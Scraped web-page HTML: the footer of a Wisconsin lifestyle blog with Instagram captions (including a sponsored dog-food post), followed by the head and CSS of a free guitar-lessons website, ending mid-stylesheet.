src="//scontent-ort2-2.cdninstagram.com/vp/a326cf8221e55f4baaf3f1399c98b9d0/5D6F97B9/t51.2885-15/sh0.08/e35/c0.180.1440.1440a/s640x640/59417011_2433815669970085_7086919922987052421_n.jpg?_nc_ht=scontent-ort2-2.cdninstagram.com" alt="Hazel is making another appearance. Hazel is a chihuahua poodle mix and she&#039;s only 3.9lbs, she&#039;s the princess of the house and has a lot of quirky traits. ⁣ ⁣ 🐶One of her quirky traits is that she loves to play with her food pebbles. ⁣ 🐶We feed her @purina Beneful® IncrediBites with Real Chicken. Which is available at your local @target. ⁣ 🐶Not only are they small and perfect for her but because they&#039;re made with wholesome ingredients so she can live life to the fullest. Read more on the blog [LINK IN BIO]⁣ ⁣ #ad #growinguppurina #thejasminemaria #midwestbloggers #dogmom #chihuahuapoodmix #purina #wisconsinbloggers #lovelysquares #chihuahuapoodle #madisonblogger #darlingdaily #photosinbetween #lifestylebloggers" title="Hazel is making another appearance. Hazel is a chihuahua poodle mix and she&#039;s only 3.9lbs, she&#039;s the princess of the house and has a lot of quirky traits. ⁣ ⁣ 🐶One of her quirky traits is that she loves to play with her food pebbles. ⁣ 🐶We feed her @purina Beneful® IncrediBites with Real Chicken. Which is available at your local @target. ⁣ 🐶Not only are they small and perfect for her but because they&#039;re made with wholesome ingredients so she can live life to the fullest. Read more on the blog [LINK IN BIO]⁣ ⁣ #ad #growinguppurina #thejasminemaria #midwestbloggers #dogmom #chihuahuapoodmix #purina #wisconsinbloggers #lovelysquares #chihuahuapoodle #madisonblogger #darlingdaily #photosinbetween #lifestylebloggers" class=""/></a></li><li class=""><a href="//instagram.com/p/BxPpPbElqBO/" target="_blank" class=""><img src="//scontent-ort2-2.cdninstagram.com/vp/3542e8b6168e9c5f1b3d1b31346a032a/5D641F03/t51.2885-15/sh0.08/e35/c0.179.1440.1440a/s640x640/59923676_278455832907186_117992130055924500_n.jpg?_nc_ht=scontent-ort2-2.cdninstagram.com" alt="📱Do you have a friend who&#039;s a social media influencer/ blogger? ⁣ ⁣ 📱Did you know that your support means the world to them? ⁣ ⁣ I am sharing 6 ways you can show support and they&#039;re easy to do! [LINK IN BIO]⁣ ⁣ HOW TO SHOP:⁣⁣⁣⁣⁣⁣ 1️⃣Search for “thejasminemaria” on the @liketoknow.it app ⁣⁣⁣⁣⁣⁣⁣⁣ 2️⃣Screenshot this picture and open the LikeToKnow.It app⁣⁣⁣⁣⁣⁣ 3️⃣Type this into your browser: http://liketk.it/2BHCF⁣ ⁣ #thejasminemaria #wisconsinblogger #midwestbloggers #liketkit #LTKstyletip #LTKunder100 #LTKunder50 #LTKspring #LTKcurves #bloggertribe #nbrtribe #naturalbeadedrows #wisconsinbloggers #lovelysquares #loft #loveoft #liketoknowit #realoutfitinstagram #springstyle #styleblogger" title="📱Do you have a friend who&#039;s a social media influencer/ blogger? ⁣ ⁣ 📱Did you know that your support means the world to them? ⁣ ⁣ I am sharing 6 ways you can show support and they&#039;re easy to do! [LINK IN BIO]⁣ ⁣ HOW TO SHOP:⁣⁣⁣⁣⁣⁣ 1️⃣Search for “thejasminemaria” on the @liketoknow.it app ⁣⁣⁣⁣⁣⁣⁣⁣ 2️⃣Screenshot this picture and open the LikeToKnow.It app⁣⁣⁣⁣⁣⁣ 3️⃣Type this into your browser: http://liketk.it/2BHCF⁣ ⁣ #thejasminemaria #wisconsinblogger #midwestbloggers #liketkit #LTKstyletip #LTKunder100 #LTKunder50 #LTKspring #LTKcurves #bloggertribe #nbrtribe #naturalbeadedrows #wisconsinbloggers #lovelysquares #loft #loveoft #liketoknowit #realoutfitinstagram #springstyle #styleblogger" class=""/></a></li></ul><p class="clear"><a href="//instagram.com/thejasminemaria/" rel="me" target="_blank" class="">@thejasminemaria</a></p></div></section></div><div class="footer-area-two"><div class="wrap"><section id="minimal-social-icons-10" class="widget minimal-social-icons"><div class="widget-wrap"><ul class="aligncenter"><li class="ssi-instagram"><a href="https://www.instagram.com/thejasminemaria" target="_blank"><i class="fa fa-instagram"></i></a></li><li class="ssi-twitter"><a href="https://www.twitter.com/thejasminemaria" target="_blank"><i class="fa fa-twitter"></i></a></li><li class="ssi-bloglovin"><a href="https://www.bloglovin.com/blogs/jasmine-maria-14935831" target="_blank"><i class="fa fa-heart"></i></a></li><li class="ssi-pinterest"><a href="https://www.pinterest.com/thejasminemaria" target="_blank"><i class="fa fa-pinterest-p"></i></a></li><li class="ssi-facebook"><a href="https://www.facebook.com/thejasminemaria" target="_blank"><i class="fa fa-facebook"></i></a></li></ul></div></section></div></div><footer class="site-footer" itemscope itemtype="https://schema.org/WPFooter"><div class="wrap"><nav class="nav-secondary" aria-label="Secondary" itemscope itemtype="https://schema.org/SiteNavigationElement"><div class="wrap"><ul id="menu-footer" class="menu genesis-nav-menu menu-secondary js-superfish"><li id="menu-item-10488" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10488"><a href="https://jasminemaria.com/privacy-policy-disclosures/" itemprop="url"><span itemprop="name">Privacy Policy &#038; Disclosures</span></a></li><li id="menu-item-10489" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-10489"><a href="https://jasminemaria.com/request-join-pinterest-group-boards/" itemprop="url"><span itemprop="name">Request to Join Pinterest Group Boards</span></a></li><li id="menu-item-10765" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-10765"><a href="https://www.liketoknow.it/thejasminemaria" itemprop="url"><span itemprop="name">LikeToKnow.It</span></a></li><li id="menu-item-11770" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-11770"><a href="http://www.makeupbyjasminev.com" itemprop="url"><span itemprop="name">Makeup Services</span></a></li></ul></div></nav><div class="footer-credits"><div class="wrap"><span class="first one-half credits-left">Copyright © 2019 <a href="https://jasminemaria.com/" title="Jasmine Maria">Jasmine Maria</a>, Made by <a href="https://underlinedesigns.com/" rel="nofollow" target="_blank" title="Underline Designs">Underline Designs</a></span><span class="one-half credits-right"><a class="back-top" href="#">Back to Top</a></span></div></div></div></footer></div> <script type="text/javascript">var sbiajaxurl = "https://jasminemaria.com/wp-admin/admin-ajax.php";</script> <script type='text/javascript'>jQuery(document).ready(function($) {$(".flexslider").flexslider({controlsContainer: "#genesis-responsive-slider",animation: "slide",directionNav: 1,controlNav: 1,animationDuration: 800,slideshowSpeed: 4000 }); });</script><script type='text/javascript'>var thickboxL10n = {"next":"Next >","prev":"< Prev","image":"Image","of":"of","close":"Close","noiframes":"This feature requires inline frames. You have iframes disabled or your browser does not support them.","loadingAnimation":"https:\/\/jasminemaria.com\/wp-includes\/js\/thickbox\/loadingAnimation.gif"};</script> <script type='text/javascript'>var wprm_public = {"settings":{"features_comment_ratings":true},"home_url":"https:\/\/jasminemaria.com\/","permalinks":"\/%year%\/%monthnum%\/%postname%\/","ajax_url":"https:\/\/jasminemaria.com\/wp-admin\/admin-ajax.php","nonce":"7b56599e8e","api_nonce":"92635ae9f8"};</script> <script type='text/javascript'>var sb_instagram_js_options = {"sb_instagram_at":"","font_method":"svg"};</script> <script type='text/javascript'>var genesis_responsive_menu = {"mainMenu":"Menu","menuIconClass":"dashicons-before dashicons-menu","subMenu":"Submenu","subMenuIconsClass":"dashicons-before dashicons-arrow-down-alt2","menuClasses":{"combine":[".nav-primary",".nav-header"],"others":[]}};</script> <script type='text/javascript'>var megamenu = {"timeout":"300","interval":"100"};</script> <script type='text/javascript'>/*Google Tag Manager for Collective Bias*/ dataLayerCBias = [{ 'trackingID': 'UA-65101642-24', 'javaScriptVersion': 'analytics.js', 'homePageURL': 'https://jasminemaria.com' }];</script> <noscript> <iframe src='//www.googletagmanager.com/ns.html?id=GTM-PBN79J' height='0' width='0' style='display:none;visibility:hidden'></iframe> </noscript> <script type='text/javascript'>(function() { window.setTimeout(function() { (function(w, d, s, l, i) { w[l] = w[l] || []; w[l].push({ 'gtm.start': new Date().getTime(), event: 'gtm.js' }); var f = d.getElementsByTagName(s)[0], j = d.createElement(s), dl = l != 'dataLayer' ? '&l=' + l : ''; j.async = true; j.src = '//www.googletagmanager.com/gtm.'+'js?id=' + i + dl; f.parentNode.insertBefore(j, f); })(window, document, 'script', 'dataLayerCBias', 'GTM-PBN79J'); }); })(); /*End Google Tag Manager for Collective Bias*/</script><script type="text/javascript" defer src="https://jasminemaria.com/wp-content/cache/autoptimize/js/autoptimize_b0fa8595d1d5dfebe1337a8294bb80ec.js"></script></body></html>
0
<!DOCTYPE html> <html lang="en-GB" prefix="og: http://ogp.me/ns#"> <head > <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>Free online guitar lessons and private tuition - Anyone Can Play Guitar</title> <!-- This site is optimized with the Yoast SEO plugin v11.0 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="A collection of over 150 top-quality, completely free guitar lessons from Adrian Woodward, a teacher with 20 years experience who has helped thousands of guitarists to reach their goal. There&#039;s something here for everybody, no matter what your level of experience or what kind of music you&#039;re into."/> <link rel="canonical" href="https://www.anyonecanplayguitar.co.uk/" /> <meta property="og:locale" content="en_GB" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Free online guitar lessons and private tuition - Anyone Can Play Guitar" /> <meta property="og:description" content="A collection of over 150 top-quality, completely free guitar lessons from Adrian Woodward, a teacher with 20 years experience who has helped thousands of guitarists to reach their goal. There&#039;s something here for everybody, no matter what your level of experience or what kind of music you&#039;re into." /> <meta property="og:url" content="https://www.anyonecanplayguitar.co.uk/" /> <meta property="og:site_name" content="Anyone Can Play Guitar" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="A collection of over 150 top-quality, completely free guitar lessons from Adrian Woodward, a teacher with 20 years experience who has helped thousands of guitarists to reach their goal. There&#039;s something here for everybody, no matter what your level of experience or what kind of music you&#039;re into." /> <meta name="twitter:title" content="Free online guitar lessons and private tuition - Anyone Can Play Guitar" /> <meta name="twitter:site" content="@acpgtr" /> <meta name="twitter:image" content="https://www.anyonecanplayguitar.co.uk/wp-content/uploads/2016/12/Adrian_Front_Page-1024x665.jpg" /> <meta name="twitter:creator" content="@acpgtr" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.anyonecanplayguitar.co.uk/#organization","name":"Anyone Can Play Guitar","url":"https://www.anyonecanplayguitar.co.uk/","sameAs":["https://www.facebook.com/anyonecanplayguitar.co.uk","https://www.instagram.com/acpgtr/","https://www.youtube.com/c/anyonecanplayguitarcouk","https://twitter.com/acpgtr"],"logo":{"@type":"ImageObject","@id":"https://www.anyonecanplayguitar.co.uk/#logo","url":"https://www.anyonecanplayguitar.co.uk/wp-content/uploads/2018/05/anyone-can-play-guitar-logo.png","caption":"Anyone Can Play Guitar"},"image":{"@id":"https://www.anyonecanplayguitar.co.uk/#logo"}},{"@type":"WebSite","@id":"https://www.anyonecanplayguitar.co.uk/#website","url":"https://www.anyonecanplayguitar.co.uk/","name":"Anyone Can Play Guitar","publisher":{"@id":"https://www.anyonecanplayguitar.co.uk/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://www.anyonecanplayguitar.co.uk/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://www.anyonecanplayguitar.co.uk/#webpage","url":"https://www.anyonecanplayguitar.co.uk/","inLanguage":"en-GB","name":"Free online guitar lessons and private tuition - Anyone Can Play Guitar","isPartOf":{"@id":"https://www.anyonecanplayguitar.co.uk/#website"},"about":{"@id":"https://www.anyonecanplayguitar.co.uk/#organization"},"datePublished":"2016-12-14T20:46:14+00:00","dateModified":"2019-05-03T09:47:03+00:00","description":"A collection of over 150 top-quality, completely free guitar lessons from Adrian Woodward, a teacher with 20 years experience who has helped thousands of guitarists to reach their goal. There's something here for everybody, no matter what your level of experience or what kind of music you're into."}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//platform-api.sharethis.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//use.fontawesome.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Anyone Can Play Guitar &raquo; Feed" href="https://www.anyonecanplayguitar.co.uk/feed/" /> <link rel="alternate" type="application/rss+xml" title="Anyone Can Play Guitar &raquo; Comments Feed" href="https://www.anyonecanplayguitar.co.uk/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.anyonecanplayguitar.co.uk\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='flick-css' href='https://www.anyonecanplayguitar.co.uk/wp-content/plugins/mailchimp//css/flick/flick.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='anyone-can-play-guitar-css' href='https://www.anyonecanplayguitar.co.uk/wp-content/themes/anyonecanplayguitar/style.css?ver=1.0' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='https://www.anyonecanplayguitar.co.uk/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://www.anyonecanplayguitar.co.uk/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='genesis-sample-fonts-css' href='//fonts.googleapis.com/css?family=Nunito+Sans%3A300%2C400&#038;ver=1.0' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='https://www.anyonecanplayguitar.co.uk/wp-includes/css/dashicons.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='gca-column-styles-css' href='https://www.anyonecanplayguitar.co.uk/wp-content/plugins/genesis-columns-advanced/css/gca-column-styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='responsive-menu-pro-font-awesome-css' href='https://use.fontawesome.com/releases/v5.2.0/css/all.css' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='https://www.anyonecanplayguitar.co.uk/wp-content/plugins/jetpack/css/jetpack.css?ver=7.2.1' type='text/css' media='all' /> <script type='text/javascript' src='https://www.anyonecanplayguitar.co.uk/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.anyonecanplayguitar.co.uk/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://www.anyonecanplayguitar.co.uk/wp-content/plugins/mailchimp//js/scrollTo.js?ver=1.5.7'></script> <script type='text/javascript' src='https://www.anyonecanplayguitar.co.uk/wp-includes/js/jquery/jquery.form.min.js?ver=4.2.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var mailchimpSF = {"ajax_url":"https:\/\/www.anyonecanplayguitar.co.uk\/"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.anyonecanplayguitar.co.uk/wp-content/plugins/mailchimp//js/mailchimp.js?ver=1.5.7'></script> <script type='text/javascript' src='https://www.anyonecanplayguitar.co.uk/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.anyonecanplayguitar.co.uk/wp-content/plugins/mailchimp//js/datepicker.js?ver=5.1.1'></script> <!--[if lt IE 9]> <script type='text/javascript' src='https://www.anyonecanplayguitar.co.uk/wp-content/themes/genesis/lib/js/html5shiv.min.js?ver=3.7.3'></script> <![endif]--> <script type='text/javascript' src='//platform-api.sharethis.com/js/sharethis.js#product=ga&#038;property=58f9e5ef2fe73a0012cb5165'></script> <script type='text/javascript' src='https://www.anyonecanplayguitar.co.uk/wp-content/plugins/responsive-menu-pro/public/js/noscroll.js'></script> <link rel='https://api.w.org/' href='https://www.anyonecanplayguitar.co.uk/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.anyonecanplayguitar.co.uk/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.anyonecanplayguitar.co.uk/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <link rel='shortlink' href='https://www.anyonecanplayguitar.co.uk/' /> <link rel="alternate" type="application/json+oembed" href="https://www.anyonecanplayguitar.co.uk/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.anyonecanplayguitar.co.uk%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.anyonecanplayguitar.co.uk/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.anyonecanplayguitar.co.uk%2F&#038;format=xml" /> <script type="text/javascript"> jQuery(function($) { $('.date-pick').each(function() { var format = $(this).data('format') || 'mm/dd/yyyy'; format = format.replace(/yyyy/i, 'yy'); $(this).datepicker({ autoFocusNextInput: true, constrainInput: false, changeMonth: true, changeYear: true, beforeShow: function(input, inst) { $('#ui-datepicker-div').addClass('show'); }, dateFormat: format.toLowerCase(), }); }); d = new Date(); $('.birthdate-pick').each(function() { var format = $(this).data('format') || 'mm/dd'; format = format.replace(/yyyy/i, 'yy'); $(this).datepicker({ autoFocusNextInput: true, constrainInput: false, changeMonth: true, changeYear: false, minDate: new Date(d.getFullYear(), 1-1, 1), maxDate: new Date(d.getFullYear(), 12-1, 31), beforeShow: function(input, inst) { $('#ui-datepicker-div').removeClass('show'); }, dateFormat: format.toLowerCase(), }); }); }); </script> <style type='text/css'>img#wpstats{display:none}</style><script src="https://use.fontawesome.com/f17d76eecb.js"></script><style type="text/css">.site-title a { background: url(https://www.anyonecanplayguitar.co.uk/wp-content/uploads/2018/06/anyone-can-play-guitar-logo-white.png) no-repeat !important; }</style> <link rel="icon" href="https://www.anyonecanplayguitar.co.uk/wp-content/uploads/2018/05/cropped-favicon-32x32.png" sizes="32x32" /> <link rel="icon" href="https://www.anyonecanplayguitar.co.uk/wp-content/uploads/2018/05/cropped-favicon-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://www.anyonecanplayguitar.co.uk/wp-content/uploads/2018/05/cropped-favicon-180x180.png" /> <meta name="msapplication-TileImage" content="https://www.anyonecanplayguitar.co.uk/wp-content/uploads/2018/05/cropped-favicon-270x270.png" /> <style>button#responsive-menu-pro-button, #responsive-menu-pro-container { display: none; -webkit-text-size-adjust: 100%; } #responsive-menu-pro-container { z-index: 99998; } @media screen and (max-width: 860px) { #responsive-menu-pro-container { display: block; position: fixed; top: 0; bottom: 0; padding-bottom: 5px; margin-bottom: -5px; outline: 1px solid transparent; overflow-y: auto; overflow-x: hidden; } #responsive-menu-pro-container .responsive-menu-pro-search-box { width: 100%; padding: 0 2%; border-radius: 2px; height: 50px; -webkit-appearance: none; } #responsive-menu-pro-container.push-left, #responsive-menu-pro-container.slide-left { transform: translateX(-100%); -ms-transform: translateX(-100%); -webkit-transform: translateX(-100%); -moz-transform: translateX(-100%); } .responsive-menu-pro-open #responsive-menu-pro-container.push-left, .responsive-menu-pro-open #responsive-menu-pro-container.slide-left { transform: translateX(0); -ms-transform: translateX(0); -webkit-transform: translateX(0); -moz-transform: translateX(0); } #responsive-menu-pro-container.push-top, #responsive-menu-pro-container.slide-top { transform: translateY(-100%); -ms-transform: translateY(-100%); -webkit-transform: translateY(-100%); -moz-transform: translateY(-100%); } .responsive-menu-pro-open #responsive-menu-pro-container.push-top, .responsive-menu-pro-open #responsive-menu-pro-container.slide-top { transform: translateY(0); -ms-transform: translateY(0); -webkit-transform: translateY(0); -moz-transform: translateY(0); } #responsive-menu-pro-container.push-right, #responsive-menu-pro-container.slide-right { transform: translateX(100%); -ms-transform: translateX(100%); -webkit-transform: translateX(100%); -moz-transform: translateX(100%); } .responsive-menu-pro-open #responsive-menu-pro-container.push-right, .responsive-menu-pro-open #responsive-menu-pro-container.slide-right { transform: translateX(0); -ms-transform: translateX(0); -webkit-transform: translateX(0); -moz-transform: translateX(0); } #responsive-menu-pro-container.push-bottom, #responsive-menu-pro-container.slide-bottom { transform: translateY(100%); -ms-transform: translateY(100%); -webkit-transform: translateY(100%); -moz-transform: translateY(100%); } .responsive-menu-pro-open #responsive-menu-pro-container.push-bottom, .responsive-menu-pro-open #responsive-menu-pro-container.slide-bottom { transform: translateY(0); -ms-transform: translateY(0); -webkit-transform: translateY(0); -moz-transform: translateY(0); } #responsive-menu-pro-container, #responsive-menu-pro-container:before, #responsive-menu-pro-container:after, #responsive-menu-pro-container *, #responsive-menu-pro-container *:before, #responsive-menu-pro-container *:after { box-sizing: border-box; margin: 0; padding: 0; } #responsive-menu-pro-container #responsive-menu-pro-search-box, #responsive-menu-pro-container #responsive-menu-pro-additional-content, #responsive-menu-pro-container #responsive-menu-pro-title { padding: 25px 5%; } #responsive-menu-pro-container #responsive-menu-pro, #responsive-menu-pro-container #responsive-menu-pro ul { width: 100%; } #responsive-menu-pro-container #responsive-menu-pro ul.responsive-menu-pro-submenu { display: none; } #responsive-menu-pro-container #responsive-menu-pro ul.responsive-menu-pro-submenu.responsive-menu-pro-submenu-open { display: block; } #responsive-menu-pro-container #responsive-menu-pro ul.responsive-menu-pro-submenu-depth-1 a.responsive-menu-pro-item-link { padding-left: 10%; } #responsive-menu-pro-container #responsive-menu-pro ul.responsive-menu-pro-submenu-depth-2 a.responsive-menu-pro-item-link { padding-left: 15%; } #responsive-menu-pro-container #responsive-menu-pro ul.responsive-menu-pro-submenu-depth-3 a.responsive-menu-pro-item-link { padding-left: 20%; } #responsive-menu-pro-container #responsive-menu-pro ul.responsive-menu-pro-submenu-depth-4 a.responsive-menu-pro-item-link { padding-left: 25%; } #responsive-menu-pro-container #responsive-menu-pro ul.responsive-menu-pro-submenu-depth-5 a.responsive-menu-pro-item-link { padding-left: 30%; } #responsive-menu-pro-container li.responsive-menu-pro-item { width: 100%; list-style: none; } #responsive-menu-pro-container li.responsive-menu-pro-item a { width: 100%; display: block; text-decoration: none; padding: 0 5%; position: relative; } #responsive-menu-pro-container li.responsive-menu-pro-item a .glyphicon, #responsive-menu-pro-container li.responsive-menu-pro-item a .fab, #responsive-menu-pro-container li.responsive-menu-pro-item a .fas { margin-right: 15px; } #responsive-menu-pro-container li.responsive-menu-pro-item a .responsive-menu-pro-subarrow { position: absolute; top: 0; bottom: 0; text-align: center; overflow: hidden; } #responsive-menu-pro-container li.responsive-menu-pro-item a .responsive-menu-pro-subarrow .glyphicon, #responsive-menu-pro-container li.responsive-menu-pro-item a .responsive-menu-pro-subarrow .fab, #responsive-menu-pro-container li.responsive-menu-pro-item a .responsive-menu-pro-subarrow .fas { margin-right: 0; } button#responsive-menu-pro-button .responsive-menu-pro-button-icon-inactive { display: none; } button#responsive-menu-pro-button { z-index: 99999; display: none; overflow: hidden; outline: none; } button#responsive-menu-pro-button img { max-width: 100%; } .responsive-menu-pro-label { display: inline-block; font-weight: 600; margin: 0 5px; vertical-align: middle; } .responsive-menu-pro-accessible { display: inline-block; } .responsive-menu-pro-accessible .responsive-menu-pro-box { display: inline-block; vertical-align: middle; } .responsive-menu-pro-label.responsive-menu-pro-label-top, .responsive-menu-pro-label.responsive-menu-pro-label-bottom { display: block; margin: 0 auto; } button#responsive-menu-pro-button { padding: 0 0; display: inline-block; cursor: pointer; transition-property: opacity, filter; transition-duration: 0.15s; transition-timing-function: linear; font: inherit; color: inherit; text-transform: none; background-color: transparent; border: 0; margin: 0; } .responsive-menu-pro-box { width: 25px; height: 19px; display: inline-block; position: relative; } .responsive-menu-pro-inner { display: block; top: 50%; margin-top: -1.5px; } .responsive-menu-pro-inner, .responsive-menu-pro-inner::before, .responsive-menu-pro-inner::after { width: 25px; height: 3px; background-color: rgba(255, 255, 255, 1); border-radius: 4px; position: absolute; transition-property: transform; transition-duration: 0.15s; transition-timing-function: ease; } .responsive-menu-pro-open .responsive-menu-pro-inner, .responsive-menu-pro-open .responsive-menu-pro-inner::before, .responsive-menu-pro-open .responsive-menu-pro-inner::after { background-color: rgba(255, 255, 255, 1); } button#responsive-menu-pro-button:hover .responsive-menu-pro-inner, button#responsive-menu-pro-button:hover .responsive-menu-pro-inner::before, button#responsive-menu-pro-button:hover .responsive-menu-pro-inner::after, button#responsive-menu-pro-button:hover .responsive-menu-pro-open .responsive-menu-pro-inner, button#responsive-menu-pro-button:hover .responsive-menu-pro-open .responsive-menu-pro-inner::before, button#responsive-menu-pro-button:hover .responsive-menu-pro-open .responsive-menu-pro-inner::after, button#responsive-menu-pro-button:focus .responsive-menu-pro-inner, button#responsive-menu-pro-button:focus .responsive-menu-pro-inner::before, button#responsive-menu-pro-button:focus .responsive-menu-pro-inner::after, button#responsive-menu-pro-button:focus .responsive-menu-pro-open .responsive-menu-pro-inner, button#responsive-menu-pro-button:focus .responsive-menu-pro-open .responsive-menu-pro-inner::before, button#responsive-menu-pro-button:focus .responsive-menu-pro-open .responsive-menu-pro-inner::after { background-color: rgba(255, 255, 255, 1); } .responsive-menu-pro-inner::before, .responsive-menu-pro-inner::after { content: ""; display: block; } .responsive-menu-pro-inner::before { top: -8px; } .responsive-menu-pro-inner::after { bottom: -8px; } .responsive-menu-pro-spin .responsive-menu-pro-inner { transition-duration: 0.3s; transition-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19); } .responsive-menu-pro-spin .responsive-menu-pro-inner::before { transition: top 0.1s 0.34s ease-in, opacity 0.1s ease-in; } .responsive-menu-pro-spin .responsive-menu-pro-inner::after { transition: bottom 0.1s 0.34s ease-in, transform 0.3s cubic-bezier(0.55, 0.055, 0.675, 0.19); } .responsive-menu-pro-spin.is-active .responsive-menu-pro-inner { transform: rotate(225deg); transition-delay: 0.14s; transition-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1); } .responsive-menu-pro-spin.is-active .responsive-menu-pro-inner::before { top: 0; opacity: 0; transition: top 0.1s ease-out, opacity 0.1s 0.14s ease-out; } .responsive-menu-pro-spin.is-active .responsive-menu-pro-inner::after { bottom: 0; transform: rotate(-90deg); transition: bottom 0.1s ease-out, transform 0.3s 0.14s cubic-bezier(0.215, 0.61, 0.355, 1); } button#responsive-menu-pro-button { width: 50px; height: 50px; position: fixed; top: 10px; right: 2%; display: inline-block; transition: transform 0.5s, background-color 0.5s; background: rgba(0, 0, 0, 0.3); } .responsive-menu-pro-open button#responsive-menu-pro-button:hover, .responsive-menu-pro-open button#responsive-menu-pro-button:focus, button#responsive-menu-pro-button:hover, button#responsive-menu-pro-button:focus { background: rgba(0, 0, 0, 0.3); } .responsive-menu-pro-open button#responsive-menu-pro-button { background: rgba(0, 0, 0, 0.3); } button#responsive-menu-pro-button .responsive-menu-pro-box { color: rgba(255, 255, 255, 1); } .responsive-menu-pro-open button#responsive-menu-pro-button .responsive-menu-pro-box { color: rgba(255, 255, 255, 1); } .responsive-menu-pro-label { color: #ffffff; font-size: 10px; line-height: 10px; } .responsive-menu-pro-label .responsive-menu-pro-button-text-open { display: none; } .responsive-menu-pro-fade-top #responsive-menu-pro-container, .responsive-menu-pro-fade-left #responsive-menu-pro-container, .responsive-menu-pro-fade-right #responsive-menu-pro-container, .responsive-menu-pro-fade-bottom #responsive-menu-pro-container { display: none; } #responsive-menu-pro-container { width: 75%; left: 0; background: rgba(63, 65, 82, 1); transition: transform 0.5s; text-align: left; } #responsive-menu-pro-container #responsive-menu-pro-wrapper { background: rgba(63, 65, 82, 1); } #responsive-menu-pro-container #responsive-menu-pro-additional-content { color: #ffffff; } #responsive-menu-pro-container .responsive-menu-pro-search-box { background: rgba(255, 255, 255, 1); border: 2px solid rgba(77, 79, 95, 1); color: #333333; } #responsive-menu-pro-container 